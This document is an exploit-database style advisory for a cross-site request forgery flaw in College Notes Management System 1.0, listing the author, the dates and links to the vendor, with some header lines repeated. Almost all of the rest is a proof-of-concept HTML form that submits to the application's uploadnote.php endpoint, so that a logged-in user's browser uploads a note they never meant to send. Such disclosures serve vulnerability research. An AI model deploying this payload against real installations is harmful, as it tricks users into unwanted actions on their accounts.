# Exploit Title: College Notes Management System 1.0 - CSRF (Add Note)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 3, 2019
# Exploit Title: College Notes Management System 1.0 - CSRF (Add Note)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 3, 2019
# Vendor Homepage: https://anirbandutta.ml/
# Software Link: https://sourceforge.net/projects/college-notes-management/
# Software Link: https://github.com/anirbandutta9/College-Notes-Gallery
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<form role="form" action="http://localhost/[PATH]/dashboard/uploadnote.php" method="POST" enctype="multipart/form-data">

<div class="form-group">
<label for="post_title">Note Title</label>
<input type="text" name="title" class="form-control" placeholder="Eg: Php Tutorial File" value="" required="">
</div>

<div class="form-group">
<label for="post_tags">Short Note Description</label>
<input type="text" name="description" class="form-control" placeholder="Eg: Php Tutorial File includes basic php programming ...." value="" required="" "="">
</div>

<div class="form-group">
<label for="post_image">Select File</label><font color="brown"> (allowed file type: 'pdf','doc','ppt','txt','zip' | allowed maximum size: 30 mb ) </font>
<input type="file" name="file">
</div>

<button type="submit" name="upload" class="btn btn-primary" value="Upload Note">Upload Note</button><br><br>
</form>